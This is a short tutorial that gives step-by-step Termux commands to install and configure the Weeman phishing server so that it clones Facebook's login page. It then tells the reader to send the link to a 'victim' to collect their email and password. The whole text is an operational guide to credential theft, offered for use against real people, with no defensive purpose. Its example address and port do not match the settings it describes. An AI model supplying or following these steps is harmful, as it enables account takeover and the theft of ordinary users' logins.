03/03/2024
Hack anyone's facebook account
Firstly download and install the Termux app on your Android
Then open Termux and type these commands and hit enter
apt update && upgrade
Now give permission to Termux to access your memory
So type below command
termux-setup-storage
Then type this command to install python2
pkg install python2
During the installation of python2 you will be asked " Termux will use some space"
Just type Y and hit enter
Now you have to install git, for that type this command
pkg install git
After successfully installing git, type the below command to install Weeman.
git clone https://github.com/evait-security/weeman.git
After that type this command.
cd weeman && ls
Now you have to type the below command to run Weeman on Python
python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type the below command to see your IP
ifconfig
Now you got your IP address, now type the below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, in order to hack facebook using Termux, so we have typed set url to Facebook.com.
After that look at the first image
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command.
run
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8181
When your victim opens the link then it will open a phishing page and when they enter their email and password then you will easily get them as shown in the screenshot
HTTP server for phishing in python. Contribute to evait-security/weeman development by creating an account on GitHub.